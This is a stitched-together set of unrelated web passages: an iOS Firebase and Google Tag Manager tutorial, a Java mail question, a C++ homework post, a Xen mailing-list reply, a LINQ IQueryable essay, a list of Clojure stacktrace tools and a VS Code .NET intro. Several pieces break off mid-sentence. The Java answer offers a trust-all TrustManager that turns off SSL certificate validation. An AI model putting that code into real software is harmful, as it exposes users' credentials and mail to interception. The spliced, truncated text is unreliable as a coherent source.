In the rest of the blog post we will create a hypothetical ASP.NET Core web application in order to illustrate most of the required tasks when developing in .Net. Namely how to create projects and solutions, reference projects, install nuget packages, use dotnet tools (like entity framework) and run tests.
A Typical Project
The imaginary project we’ll be creating is a reminder application. The idea here is to describe a project with sufficient complexity that would require multiple projects that reference each other, a solution file and tests.
The solution will contain an ASP.NET Core project that could, for example, be used to see past and future reminders. A Console application so that we can create reminders from the command line (and to illustrate how we can have a solution with more than one running project) and a class library that will contain all the common logic. We’ll also add a test project to illustrate how unit tests can be run from the command line and inside VS Code.
Creating the projects and solution file
By this time you should have installed .Net Core and Visual Studio Code. You should be able to open a terminal window and type
$ dotnet
and get an output something similar to this:
Usage: dotnet [options] Usage: dotnet [path-to-application] Options: -h|--help Display help. --version Display version. path-to-application: The path to an application .dll file to execute.
One of the options of the dotnet command is "new". To check that and other options' help pages just do dotnet [option] --help, in this case dotnet new --help.
That will display a list of possible project templates to choose from. For example to create an ASP.NET Core MVC project:
$ dotnet new mvc
If you run that as it is, a new MVC project will be created in the current folder, using the name of the current folder as the default namespace and project name.
You might not want that. In case you don't, you can use the --name and --output options. Using --name (or -n) you can specify the default namespace, and with --output (or -o) you can specify the folder name to create and where to place the project files. If you use --name and don't specify --output, the output folder will implicitly take the same value as --name.
It is probably a good idea to define the project folder structure before we continue. Here it is:
Reminders +---+ Reminders.Web +---+ Reminders.Cli +---+ Reminders.Common +---+ Reminders.Tests
First thing we need to do is to create a project folder named Reminders and then inside it do:
$ dotnet new mvc --name Reminders.Web $ dotnet new console --name Reminders.Cli $ dotnet new classlib --name Reminders.Common $ dotnet new xunit --name Reminders.Tests
This will create 4 projects, one MVC, one console, a class library and a xUnit test project.
It’s a good idea to create a solution file as well. Especially if eventually you want to open these projects in full Visual Studio, which will prompt you to create one until you eventually do it.
There are advantages in having a solution file other than avoiding full Visual Studio nagging you about creating the .sln file. If you have one you can just go to the Reminders folder and do a dotnet build or a dotnet restore, and that will build/restore all projects referenced in the .sln file. Also, if you have a .sln file you can open all projects in VS Code by starting VS Code in the folder where the .sln file is located.
Let’s create our .sln file, name it Reminders.sln and add the four projects to it (inside the Reminders folder):
$ dotnet new sln --name Reminders $ dotnet sln add Reminders.Web/Reminders.Web.csproj $ dotnet sln add Reminders.Cli/Reminders.Cli.csproj $ dotnet sln add Reminders.Common/Reminders.Common.csproj $ dotnet sln add Reminders.Tests/Reminders.Tests.csproj
Adding project references
In full Visual Studio when you want to add a reference to a project you can just right click on references and select Add Reference, pick the project you want to add and you’re done.
VS Code does not have that functionality. To do this we need to resort to the command line, but it’s just as easy. For example, let’s reference Reminders.Common in Reminders.Web, Reminders.Cli and Reminders.Tests.
Navigate to the folder where the .sln file is (Reminders) and type:
$ dotnet add Reminders.Web/Reminders.Web.csproj reference Reminders.Common/Reminders.Common.csproj $ dotnet add Reminders.Cli/Reminders.Cli.csproj reference Reminders.Common/Reminders.Common.csproj $ dotnet add Reminders.Tests/Reminders.Tests.csproj reference Reminders.Common/Reminders.Common.csproj
If you want to have a look at which other projects are referenced by a particular project you can either open the .csproj file and look at the ProjectReference entries or, if you want to do it from the command line: dotnet list PathToCsProj reference. You can also navigate to the folder where a particular project is and simply do dotnet add reference pathToOtherProject.csproj.
Picking the startup project
Open the solution in VS Code. The easiest way to do that is to navigate to the Reminders folder (where the .sln file is) and type
code ..
When you do that you should get a message in VS Code: “Required assets to build and debug are missing from ‘Reminders’. Add them?”
Click Yes.
That will create a .vscode folder. In that folder there are two files: launch.json and tasks.json.
launch.json configures what happens when you press F5 inside VS Code.
For me the project that will run is the Reminders.Cli console project:
{
    "version": "0.2.0",
    "configurations": [
        {
            "name": ".NET Core Launch (console)",
            "type": "coreclr",
            "request": "launch",
            "preLaunchTask": "build",
            "program": "${workspaceFolder}/Reminders.Cli/bin/Debug/netcoreapp2.0/Reminders.Cli.dll",
            "args": [],
            "cwd": "${workspaceFolder}/Reminders.Cli",
            // For more information about the 'console' field, see
            "console": "internalConsole",
            "stopAtEntry": false,
            "internalConsoleOptions": "openOnSessionStart"
        },
        {
            "name": ".NET Core Attach",
            "type": "coreclr",
            "request": "attach",
            "processId": "${command:pickProcess}"
        }
    ]
}
Also, the tasks.json will only compile the Reminders.Cli project:
{ "version": "2.0.0", "tasks": [ { "label": "build", "command": "dotnet", "type": "process", "args": [ "build", "${workspaceFolder}/Reminders.Cli/Reminders.Cli.csproj" ], "problemMatcher": "$msCompile" } ] }
It is possible to customize these two files so that you can pick which project to run. In this case we want to be able to run either Reminders.Web or Reminders.Cli.
The first thing you should do is to remove the second item in tasks.json's args array: "${workspaceFolder}/Reminders.Cli/Reminders.Cli.csproj". We don't need it because we have the solution file (Reminders.sln). When dotnet build is executed in the folder that contains the .sln file, all the projects referenced in the solution get built.
After that we can now go to launch.json and click the "Add Configuration…" button in the bottom left corner.
Select “.Net: Launch a local .NET Core Web Application” and in the generated json change “program” and “cwd” (current working directory) to:
"program": "${workspaceRoot}/Reminders.Web/bin/Debug/netcoreapp2.0/Reminders.Web.dll", "cwd": "${workspaceRoot}/Reminders.Web"
You can now go to the Debug “section” of Visual Studio Code and see the Web and Console app configuration there:
Note that you can change the configuration names if you like, just change the "name" property in launch.json.
Now when you press F5 inside VS Code the project that will run is the one that is selected in the Debug section of VS Code.
This only affects VS Code though; the dotnet run command is unaffected by these changes. In the terminal, if you navigate to the solution's folder and type dotnet run you'll get an error (Couldn't find a project to run…). You need to use the --project argument and specify the path to the csproj file you want to run, e.g.: dotnet run --project Reminders.Web/Reminders.Web.csproj. Alternatively you can navigate to the project's folder and execute dotnet run there.
Adding Classes and Interfaces
In full Visual Studio you have several templates available when adding new files to a project.
In VS Code the only out of the box option is to create a new file and use the VS Code snippets (e.g. typing class and then TAB).
Fortunately there’s a VS Code extension named “C# Extensions” which adds two options to the context menu on VS Code’s explorer view: “New C# Class” and “New C# Interface”.
This extension also adds the ability to generate a class’ constructor from properties, generate properties from the constructor and add read-only properties and initialize them (there are demos of this in the extension’s page).
This section wouldn’t be complete without mentioning a currently abandoned alternative named yeoman, specifically the generator-aspnet.
Yeoman is a nodejs application that allows you to install yeoman generators which generate code. For ASP.NET Core there was a particularly interesting generator named generator-aspnet.
That generator provided a set of project templates similar to what dotnet new now offers (mvc application, console app, etc). But that was not the most interesting thing about generator-aspnet. It was its set of subgenerators.
A subgenerator in yeoman is a small generator for creating just one file, for example a class, an interface or an empty html page. Here's an example of using generator-aspnet to create a new class:
yo aspnet:class ClassName
Generator-aspnet had loads of these:
yo aspnet:angularcontroller [options] <name> yo aspnet:angularcontrolleras [options] <name> yo aspnet:angulardirective [options] <name> yo aspnet:angularfactory [options] <name> yo aspnet:angularmodule [options] <name> yo aspnet:appsettings [options] yo aspnet:bowerjson [options] yo aspnet:class [options] <name> yo aspnet:coffeescript [options] <name> yo aspnet:dockerfile [options] yo aspnet:gitignore [options] yo aspnet:gruntfile [options] yo aspnet:gulpfile [options] <name> yo aspnet:htmlpage [options] <name> yo aspnet:interface [options] <name> yo aspnet:javascript [options] <name> yo aspnet:json [options] <name> yo aspnet:jsonschema [options] <name> yo aspnet:middleware [options] <name> yo aspnet:mvccontroller [options] <name> yo aspnet:mvcview [options] <name> yo aspnet:nuget [options] yo aspnet:packagejson [options] yo aspnet:program [options] yo aspnet:startup [options] yo aspnet:stylesheet [options] <name> yo aspnet:stylesheetless [options] <name> yo aspnet:stylesheetscss [options] <name> yo aspnet:taghelper [options] <name> yo aspnet:textfile [options] <name> yo aspnet:tfignore [options] yo aspnet:typescript [options] <name> yo aspnet:typescriptconfig [options] <name> yo aspnet:typescriptjsx [options] <name> yo aspnet:usersecrets [options] <name> yo aspnet:webapicontroller [options] <name>
Unfortunately they were removed in version 0.3.0. This list is from
From the talk on the generator-aspnet github issues, although never mentioned explicitly, it seems that dotnet new is the only way to go from now on. Unfortunately the only generation commands that are similar to these subgenerators in dotnet new are Nuget Config, Web Config, Razor Page, MVC ViewImports and MVC Viewstart (you get a list of them when you type dotnet new --help).
You can still install a specific pre-0.3.0 version of generator-aspnet though (npm install generator-aspnet@<version>) and use it (some of the generators are still useful).
However, for creating classes the extension I mentioned previously is the easiest and most convenient to use. Let's use it to create a Reminder class inside the Reminders.Common project.
The Reminder class has an Id property, a Description, a Date and a boolean flag IsFinished to indicate the reminder was acknowledged.
The first thing you need to do is install the "C# Extensions" extension. Then right click on Reminders.Common in the explorer view and select New Class:
Name it Reminder.cs and create the four properties. In the end it should look like this:
using System; namespace Reminders.Common { public class Reminder { public int Id { get; set; } public string Description { get; set; } public DateTime Date { get; set; } public bool IsFinished { get; set; } } }
Now put the cursor on the opening "{" after class Reminder, click the light bulb, and select "Initialize ctor from properties":
You should end up with this:
using System; namespace Reminders.Common { public class Reminder { public Reminder(int id, string description, DateTime date, bool isFinished) { this.Id = id; this.Description = description; this.Date = date; this.IsFinished = isFinished; } public int Id { get; set; } public string Description { get; set; } public DateTime Date { get; set; } public bool IsFinished { get; set; } } }
Although the constructor isn’t really necessary (and it won’t play well with Entity Framework if you are planning to use it) , it’s just an example of some nice features you get from the extension. Also, when defining properties you can use the same snippets that are available in full Visual Studio (i.e. type prop and press TAB).
Razor views
Razor pages (.cshtml) is definitely an area where VS Code is lacking. There’s no intellisense or even auto-indent.
There’s an extension in the marketplace named ASP.NET Helper which will get you intellisense, however you have to import the namespaces for your models in
_ViewImports.chtml (the extension’s requirements are at the bottom of the extensions page). Also in its current version it only seems to work if the model you use is in the same project as the view.
This extension can be useful in some situations but it’s very limited.
If this is a deal breaker for you here’s the github issue for adding Razor support to the language service that VS Code relies on and which would provide intellisense similar to what is there for the full version of Visual Studio. If you upvote or leave a comment there it will bring visibility to this issue.
If you want a good experience while creating razor pages today and you don’t mind paying a little bit of money you can try JetBrains Rider. Rider runs on Windows, Mac and Linux and is from the same people that created ReSharper. I tried it a good few months ago when it was in beta. At that time it required a fairly decent machine to run smoothly and it was lacking some features. I tried it again today while I’m writing this and it seems much much better. Razor support seems perfect.
Even though the experience with Razor in VS Code right now is not ideal, if you go with a front-end JavaScript framework (Angular, React, Vue, etc) instead of Razor, you’ll find that VS Code is excellent. I’ve used mostly Angular and TypeScript and this is an area where VS Code is arguably better then the full version of Visual Studio.
If you are somewhat familiar with Angular and are planning to use ASP.NET Core as a Web Api for your front end check out my other article Angular and ASP.NET Core.
Nuget packages
In the full version of Visual Studio there's an option to Manage NuGet Packages. You get a UI where you can search, update and install NuGet packages. In VS Code there's no support for NuGet out of the box.
Thankfully there’s an extension you can install that will enable searching, adding and removing NuGet packages from VS Code. The extension is named NuGet Package Manager.
Alternatively you can use the command line. To add a package to a project the syntax is: dotnet add PathToCsproj package PackageName. Or, if you navigate to the project you want to add the NuGet package to, you can omit the path to the csproj file: dotnet add package PackageName.
Imagine you wanted to add the Microsoft.EntityFrameworkCore package to the Reminders.Common class library. After navigating to it:
$ dotnet add package Microsoft.EntityFrameworkCore
Adding tools
An example of a CLI tool is for example Entity Framework’s tool. That’s what runs when you type in a project that has the EF tooling installed:
$ dotnet ef
And you should get this output:
_/\__ ---==/ \\ ___ ___ |. \|\ | __|| __| | ) \\\ | _| | _| \_/ | //|\\ |___||_| / \\\/\\ Entity Framework Core .NET Command Line Tools 2.0.1-rtm-125 Usage: dotnet ef [options] [command]
Unfortunately there’s no automated way of configuring dotnet tooling. If you start with a project template that doesn’t have the right setup you’ll have to manually edit the .csproj file.
Not only that but you’ll have to know the right package name and version.
This is not a problem specific to VS Code or Linux. This is a tooling problem. Here are the relevant issues in github: dotnet add package doesn’t honor package type and VS 2017: PackageType=DotnetCliTool fails to install
There’s a way to manually do it though. If you open a .csproj file you’ll notice that it has
ItemGroup sections. For example, for a new mvc project there’s this:
<ItemGroup> <PackageReference Include="Microsoft.AspNetCore.All" Version="2.0.0" /> </ItemGroup>
For the tooling you should create another ItemGroup and inside it, instead of PackageReference, use DotNetCliToolReference (there may already be an ItemGroup with DotNetCliToolReference in your project; if that's the case just add to it).
Let’s imagine we want to use the Entity Framework tooling in our web project. Navigate to
Reminders.Web and open the csproj file.
Make note of the version of the Microsoft.AspNetCore.All package. For example, let's imagine it's "2.0.0".
Create a new ItemGroup (or find the ItemGroup that already has DotNetCliToolReferences) and inside add the DotNetCliToolReference for Microsoft.EntityFrameworkCore.Tools.DotNet with Version="2.0.0".
<ItemGroup> <PackageReference Include="Microsoft.AspNetCore.All" Version="2.0.0" /> </ItemGroup> <ItemGroup> <DotNetCliToolReference Include="Microsoft.EntityFrameworkCore.Tools.DotNet" Version="2.0.0" /> <!-- ADD THIS --> <DotNetCliToolReference Include="Microsoft.VisualStudio.Web.CodeGeneration.Tools" Version="2.0.0" /> </ItemGroup>
You should now be able to run dotnet ef in the Reminders.Web project.
The reason the version must match "Microsoft.AspNetCore.All" is because that package is a metapackage, i.e. a package that just references other packages. Some of those packages are Entity Framework packages, which would cause compatibility issues with the tooling if the version did not match.
If we were installing Entity Framework Core tooling in a console project we wouldn't need to worry about the version. We would, however, have to add the package Microsoft.EntityFrameworkCore.Design in addition to manually adding the DotNetCliToolReference.
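As a preview, here's a minimal sketch (mine, not from the post) of a DbContext for the Reminder entity. The SQLite provider and connection string are placeholder choices, and UseSqlite additionally requires the Microsoft.EntityFrameworkCore.Sqlite package:

using Microsoft.EntityFrameworkCore;

namespace Reminders.Common
{
    public class RemindersContext : DbContext
    {
        public DbSet<Reminder> Reminders { get; set; }

        protected override void OnConfiguring(DbContextOptionsBuilder options)
        {
            // Placeholder provider and connection string, for illustration only
            options.UseSqlite("Data Source=reminders.db");
        }
    }
}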
Setting up Entity Framework is not straightforward in .Net Core. I'm going to describe this topic in more detail (for example how you can use it in console projects, class libraries, etc) next week. If you don't want to miss it you can subscribe (there's a subscription form in the right sidebar).
Running tests
One thing your development workflow probably involves is writing unit tests.
VS Code comes with out of the box support for running unit tests. For example if you open UnitTest1.cs you’ll notice that over the test method there are two links, run test and debug test:
This will allow you to run one unit test at a time; there's no way inside VS Code of running all the tests in a project. You can however navigate to a test project in a terminal and type:
$ dotnet test
This is the output you should get if you do it for Reminders.Tests:
Starting test execution, please wait... [xUnit.net 00:00:00.4275346] Discovering: Reminders.Tests [xUnit.net 00:00:00.5044862] Discovered: Reminders.Tests [xUnit.net 00:00:00.5549595] Starting: Reminders.Tests [xUnit.net 00:00:00.6980509] Finished: Reminders.Tests Total tests: 1. Passed: 1. Failed: 0. Skipped: 0. Test Run Successful.
Alternatively you can specify the path to the test project you want to run, for example dotnet test Reminders.Tests/Reminders.Tests.csproj.
It is also possible to specify which tests to run in the command line, for example say you only want to run the tests in class MyClassTests. Here’s how you can do that:
$ dotnet test --filter MyClassTests
The filter functionality has several more options. The example above is short for dotnet test --filter FullyQualifiedName~MyClassTests (~ means contains).
There are other handy options, for example in xUnit it’s possible to specify “traits” for tests, for example:
[Trait("TraitName", "TraitValue")] public class UnitTest1 { [Fact] public void Test1() { //... } }
You can then run:
$ dotnet test --filter TraitName=TraitValue
And only tests that have that trait will be run. You can specify Trait at a method or class level.
Although Trait is specific to xUnit, there are equivalent constructs in other testing frameworks. For example, MSTest has TestCategory.
If you prefer to do everything inside VS Code you can create tasks for running tests. First go to tasks.json and make a copy of the build task, change its label to test (or whatever you want to call it), and update the args so that instead of build, test is executed with the path to the test project, for example for Reminders.Tests:
{ "label": "test", "command": "dotnet", "type": "process", "args": [ "test", "${workspaceFolder}/Reminders.Tests/Reminders.Tests.csproj" ], "problemMatcher": "$msCompile" }
You can run tasks in VS Code by using the command palette (Ctrl + Shift + P) and typing “Run Task” and then selecting the task you want to run. You can even set a task as the “test task” and assign a keyboard shortcut for it (the same way you can do Ctrl + Shift + B to trigger a task configured as the “build task”).
To set a task as the “test task” open the command palette and select “Tasks: Configure Default Test Task”, choose the test task and you’re done.
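If you also want a keyboard shortcut for it, an entry like this in keybindings.json should do the trick (my example; pick any free key combination, the command id is VS Code's built-in run-test-task action):

// Hypothetical keybindings.json entry binding the default test task
{ "key": "ctrl+shift+t", "command": "workbench.action.tasks.test" }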
One last tip
Sometimes VS Code (actually Omnisharp) seems to go haywire, for example intellisense stops working. When that happens you can either reload VS Code by using the command palette and selecting “Reload Window” or the less aggressive option is to restart Omnisharp (the command name is: Omnisharp: Restart Omnisharp).
Hope this guide was helpful, let me know in the comments.
18 January 2010 07:49 [Source: ICIS news]
SINGAPORE (ICIS news)--South Korea’s LG Chem has bought two open-spec naphtha cargoes totalling 45,000-60,000 tonnes by tender for delivery in the second-half (H2) of February, traders said on Monday.
The cargoes fetched a premium of around $17.50/tonne (€12/tonne) to Japan CFR (cost and freight) quotes, traders said.
"The backwardation is still steep," a trader said, referring to the high premium.
The spread between first-half March and second-half March naphtha contract was at a firm $9/tonne in backwardation, reflecting strong demand in the downstream petrochemicals market despite regular maintenance planned by many ethylene producers in March, traders said.
A trader purchased a 3,000-3,500-tonne spot cargo for the first-half of February loading at a high of $1,350/tonne FOB (free on board) NE (northeast) Asia.
LG Chem plans to shut its 900,000 tonne/year naphtha cracker at
($1 = €0
|
http://www.icis.com/Articles/2010/01/18/9326426/s-koreas-lg-chem-buys-45000-60000-tonne-h2-february-naphtha.html
|
CC-MAIN-2013-48
|
refinedweb
| 166
| 59.33
|
Scripting: How to write to datasource?
I'm sure it must be possible to write to a Writeable Datasource from a script. I just haven't figured out how to do it.
This is my script:
import com.parasoft.api.*

String setRequestId(ScriptingContext context) {
    String orderId = '023' + new Date().format('yyyyMMdd')
    int productId = Math.abs(new Random().nextInt() % 999999999)
    String requestId = orderId + '00' + productId
    return requestId
}
How do I write requestId out to a data source?
Thanks!
There is no public API to do this. You must use a Data Bank. However, you can chain a Data Bank to an Extension Tool if you need a script to return the document needed as input to the Data Bank.
Please also be aware that SOAtest 9.10.2 and later has a Data Generator tool. It acts very much like a Data Bank except can auto generate values (no scripting required). I think this is a better fit for what you are trying to do.
Hello people, I'm new to the Parasoft tool. Can anyone please tell me why we use a writeable data source in script testing?
Writeable data sources are used when you need to capture data from one test that should be iterated over in a subsequent test.
Scott Seely
Microsoft Corporation
April 8, 2002
When Matt and I first proposed the standardized interface for pencil discovery and ordering, we only intended to write a few articles on the concept and then let the whole idea more or less die. Then, the strangest thing happened—we realized we wanted to keep running with the idea. Actually, the realization came in a moment of serendipitous inspiration: To build the system mentioned in our last installment, the WSDL files that describe the pencil-related interfaces would have to contain some more features. In short, the interface would have to evolve—and we could talk about an issue that will soon be a high priority for many Web service developers: versioning. If you look at the documentation, articles, and books that have gone out about Web services, they spend little time talking about successive versions of a Web service.
So this week we will look at some ways that the underlying code can change to accommodate new versions. Then, we will demonstrate these ideas by adding the missing features to the implementations of the WSDL.
What did we miss? Here is a quick list:

- The pencil schema carried no price information.
- The discovery interface had no way to return the complete catalog.
- The order interface defined no faults for bad orders.
Everyone who developed COM applications: How many of you remember the golden rules of versioning? Okay, hands down. As a quick review, here are the rules:

- Once published, an interface is immutable. Never add, remove, or change its methods.
- When the functionality must change, publish a new interface with a new identifier and leave the old one alone.
Whether talking about COM clients bound to IDL, or Web service clients bound to WSDL, these rules persist. Changing an established interface will decrease the likelihood that any clients will still work. For those clients that do still work, we can assume it is a result of luck. I don't like depending on luck. How do we take these golden precepts from COM and apply them to WSDL?
WSDL version indication is done via the targetNamespace attribute of the definitions element. This namespace gives the SOAP messages meaning by relating the messages to a specific bit of code implemented somewhere on the server. The targetNamespace attribute has an XSD type of anyURI. This attribute could be used in a large number of ways to indicate the version. For a service named Foo that was hosted at msdn.microsoft.com, a few options exist for the first version.
The targetNamespace could be named http://msdn.microsoft.com/Foo. This works by giving the interface a unique namespace name. This option does not fit our needs, however, because it does not include an obvious mechanism for indicating whether one version is earlier or later than another. I suppose you could follow up later versions of the interface by tacking numbers onto the name, but that seems silly.
The targetNamespace could be named http://msdn.microsoft.com/Foo/1.0. Again, this gives the interface a unique namespace identifier. This option fits our needs, because it gives us an obvious indicator of version as well as a place to increment that version in a way people are used to seeing. As we are dealing with an XML-centric world, however, we might do well to follow the lead of the newer XML specifications, such as SOAP 1.2, XML Schema, and XSLT. While this option is viable, it does not follow this lead.
Call the targetNamespace http://msdn.microsoft.com/Foo/2002/04/05. This has a few small advantages over option 2. For one, this is the versioning scheme employed by the newer XML specifications. People who are used to looking at XML will find versioning by date more familiar. As an added bonus, versioning by date allows a person or machine to easily figure out when the version was released. You can increase the resolution of the version to reflect the frequency of releases. A resolution down to the hour would indicate that releases are coming out far too frequently. If your team does nightly builds, extend the interim granularity of the version to the date of the build. Regardless of what you do, don't be cute and use zero-based month and day-of-month numbers. It's counterintuitive.
Of the above options, both 2 and 3 fit the bill, with 3 being the versioning option that many XML users I have talked to like the best. An added advantage of date-based versioning is that you will know how long the interface has been available.
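As a sketch of what that looks like in practice (using the hypothetical Foo service from above, not the PencilSellers.org files), the WSDL header carries the date right in the targetNamespace:

<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             name="Foo"
             targetNamespace="http://msdn.microsoft.com/Foo/2002/04/05">
  <!-- types, messages, portTypes, bindings, and services go here -->
</definitions>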
Once you have a versioning scheme ready, you still have to put those updates into your XSD and message layouts. WSDL has no concept of portType or binding inheritance. It does allow one endpoint to implement multiple bindings. To access the endpoint as one of several bindings, a specific targetNamespace would be used for the messages to indicate which binding is being invoked. To use the same endpoint in a different way, another targetNamespace is used. This is analogous to the way QueryInterface works on an object that implements different COM interfaces. It's the same object, but you access it in different ways by using different names. So, when you modify a Web service by changing existing XSD types, by adding operations, or by changing existing operations, what should you do?
When changing an XSD type, create a brand new type in a brand new namespace. This new namespace should still stick with your versioning model. If the first version was in a date-based namespace like the one above, the new namespace should only change the date information. That new type, if published on April 5, 2002, should be in a namespace ending in /2002/04/05. Any related sub-types should remain in the old namespace and simply get imported into the new one. Here, no wishy-washy answers.
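For instance (illustrative only; the earlier date here is made up), the revised schema imports the unchanged types from the prior namespace:

<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema"
            targetNamespace="http://msdn.microsoft.com/Foo/2002/04/05"
            xmlns:old="http://msdn.microsoft.com/Foo/2002/03/25">
  <!-- pull in the sub-types that did not change -->
  <xsd:import namespace="http://msdn.microsoft.com/Foo/2002/03/25" />
  <!-- new and revised types go here, referencing old:* types as needed -->
</xsd:schema>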
It gets trickier, though, when you talk about changes to the messages. Without a doubt, the changes should wind up in a new namespace that reflects the fact that its contents are newer than the interface being extended. So, if a message or XSD data type changes, the related operation, portType, and binding change too. The question here is "How?" The answer is "It depends."
If the methods are loosely related, you can get away with creating a just-enough WSDL to include the new signatures. You can tell that the methods are loosely related when an individual would not use the results of one Web method call to invoke another. For example, if a Web service exposed GetStockQuote and GetTemperature, you could separate the two methods and not harm usability at all. If you have something more like the Favorites Service, it would not make sense to version the GetFavorites call independent of AddCategory or any other Web method. When the methods in an interface are closely related, you should migrate the entire interface when revising or enhancing any part of that interface.
To sum things up, here are the guidelines to use when updating an interface:

- Never change a published interface; put every revision in a new targetNamespace.
- Version namespaces by date, changing only the date portion between releases.
- When an XSD type changes, declare the new type in the new namespace and import any unchanged sub-types from the old one.
- If the operations in an interface are only loosely related, you can version the changed operations on their own; when they are closely related, migrate the entire interface.
After looking at all of this advice for how to revise the WSDL files, the question remains: What did we do with the PencilSellers.org sample to resolve our issues with things we missed? Well, we took the schema and updated things to include what we missed. This may happen a few more times as this sample evolves. If you look at our existing WSDL, none of it includes date-based versioning information. Why did this happen? Mostly lack of thought on our parts. This installment of At Your Service represents a chance to fix that prior mistake. To do so, three items need to be updated:

- The pencil schema, which needs to carry price information.
- The pencil discovery interface, which needs to return the complete catalog.
- The pencil order interface, which needs fault definitions for bad orders.
The bindings themselves are changing quite a bit as well. A good number of the existing SOAP toolkits support document/literal encoding. Document/literal has quite a bit more flexibility in how it represents data than rpc/encoded. We chose rpc/encoded because the Apache SOAP toolkit only supports that scheme. With the release of Beta 1 of the Axis toolkit from the Apache group, they are now on an even footing with .NET-based Web services. Because of this recent change, we now feel comfortable going with document/literal encoding.
This was quite possibly the easiest item to fix. The schema describing the pencil omitted the price. We wanted to avoid people seeing a really nice pencil and then getting shocked that just one would cost $25 US. Instead, we want to deliver that shock right away. In order to do so, the schema needs to add an element to pencil that reflects the price. It's a fairly simple matter to do this.
<xsd:complexType
<xsd:sequence>
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
</xsd:sequence>
</xsd:complexType>
<xsd:element
In adding the price, we also had to decide how to handle currency. In order to keep the example somewhat simple and not stray into areas such as tracking values of currencies, we are going to assume that price information is always delivered in US dollars. The retailer is then responsible for knowing how to convert that into the local currency.
A new type also had to be added for the complete catalog. The catalog contains a listing of all items available for purchase as well as a date when the information contained in the catalog will be going bad. This type has the following declaration:
<xsd:complexType
<xsd:sequence>
<xsd:element
<xsd:element
</xsd:sequence>
</xsd:complexType>
The type section also needs to include a few new types. Specifically, it will need to include some information about specific faults being delivered to the caller for the following conditions:

- The order requests a larger quantity of an item than is currently available.
- The order references an invalid product ID.

To identify exactly what these faults will look like, we need to add two new messages and two new types. The messages and modifications to the portType and binding will be shown in the updates to the Pencil Order interface. The faults are being placed in their own namespace. The schema for these types is as follows:
<?xml version="1.0" encoding="utf-8" ?>
<xsd:schema xmlns:tns=
""
elementFormDefault="qualified"
targetNamespace=""
xmlns:
<xsd:import
<xsd:complexType
<xsd:sequence>
<xsd:element minOccurs="0" maxOccurs="1"
name="QuantityAvailable"
xmlns:
</xsd:sequence>
</xsd:complexType>
<xsd:element name="OrderItem" nillable="true"
xmlns:
<xsd:complexType
<xsd:sequence>
<xsd:element
</xsd:sequence>
</xsd:complexType>
<xsd:complexType
<xsd:sequence>
<xsd:element
</xsd:sequence>
</xsd:complexType>
</xsd:schema>
The schema imports the normal pencil schema for use in displaying which items from the order were unavailable. It lists each item as OrderItems. This time, each element indicates the order item that was unavailable in the requested amount, and indicates how many of that item is available. The number available will always be between 0 and the quantity requested.
Now that the data items have been updated, we just have to update the information for the messages the Web service accepts.
The discovery binding has a new operation, GetCatalog. As discussed, this returns the complete catalog to the caller and indicates when the data in the message expires. To do this, we add the request and response data types, a pair of messages, and some information to the binding. Since this is not a complex message, we will take a short look at the portType definition.
<operation name="GetCatalog">
<input message="discoveryMessages:GetCatalogSoapIn" />
<output message="discoveryMessages:GetCatalogSoapOut" />
</operation>
Other than this addition of an operation, all other changes to the binding had more to do with moving to document/literal and updating the namespace than anything else.
The main change here is the addition of fault information to the messages. At this point in time, ASP.NET does not make use of the fault specification, but you can still define to the developer what a fault will look like. The message that might return a fault is PlaceOrder. The operation has been updated to read as follows:
<operation name="PlaceOrder">
<input message="orderMessages:PlaceOrderSoapIn" />
<output message="orderMessages:PlaceOrderSoapOut" />
<fault message="faultMessages:NotEnoughAvailableFault" />
<fault message="faultMessages:InvalidProductIDFault" />
</operation>
Then, the binding gets updated like this:
<operation name="PlaceOrder">
<soap:operation
<input>
<soap:body
</input>
<output>
<soap:body
</output>
<fault>
<soap:fault
</fault>
</operation>
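On the wire, a failed PlaceOrder call comes back as a SOAP fault carrying one of these types in its detail element. Here is a sketch of a NotEnoughAvailable fault; the namespace URI and the exact element nesting are assumptions, since the schema above is truncated:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Client</faultcode>
      <faultstring>Not enough of the requested item is available.</faultstring>
      <detail>
        <NotEnoughAvailable xmlns="http://example.org/pencilFaults">
          <OrderItems>
            <OrderItem>
              <QuantityAvailable>2</QuantityAvailable>
            </OrderItem>
          </OrderItems>
        </NotEnoughAvailable>
      </detail>
    </soap:Fault>
  </soap:Body>
</soap:Envelope>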
When updating a Web service description, you need to do more than simply add new types and messages. You also need to think about how to indicate that the new interface is a new version of the Web service. Do not worry too much about major and minor versions when you are updating a Web service interface. By changing one little thing, you are breaking the interface contract. When that contract is broken, the client does not care if your update took a day, a month, or a year. They just need to know two things:
Yeah, you need to update your API reference, sample clients, and other project artifacts. But those two things are what the developer using your service really cares about. Make sure to update the WSDL in a sane manner. Don't worry too much about distributing the types and information across a series of XSD files. If you distribute things in a logical manner, developers will like it.
If you want to start taking advantage of defining the interface first and then letting the .NET tools handle writing the interface in your favorite language, you should make sure to get some good reference material on XSD.
At Your Service
Scott Seely is a member of the MSDN Architectural Samples team. Besides his work there, Scott is the author of SOAP: Cross Platform Web Service Development Using XML (Prentice Hall—PTR) and the lead author for Creating and Consuming Web Services in Visual Basic (Addison-Wesley).
|
http://msdn.microsoft.com/en-us/library/aa480497.aspx
|
crawl-002
|
refinedweb
| 2,219
| 54.32
|
This is what I have so far below. The //comments are what I am supposed to do but do not know how. I think I need a driver.java too. PLEASE help. I can attach the .java files if need be.
import java.io.*;
import java.util.Scanner;

public class assign3 {
    public static void main(String[] args) throws IOException {
        Scanner key = new Scanner(System.in);
        String choice = key.nextLine();
        //Create string variables, choice, input, and output
        System.out.println("Do you want to encrypt or decrypt?");
        //get the encrypt/decrypt choice

        System.out.println("Enter input file");
        Scanner keyb = new Scanner(System.in);
        String path = keyb.nextLine();
        //get the input file path
        //get the ouput file path
        //create an int variable
        //get the key value
        //make a new scanner to read from a file
        //make a new printwriter to write to the output file
        //create cipher object c with int variable as argument

        if (choice.equals("encrypt")) {
            while (/*scanner associated with file has next line*/) {
                //read a line from the file store it in a string called, say, indata
                //create a string variable called, say, outdata
                outdata = c.encryptLine(indata);
                //write outdata to file
            }
        } else {
            //do the same for decrypting
        }
        //close PrintWriter
    }
}
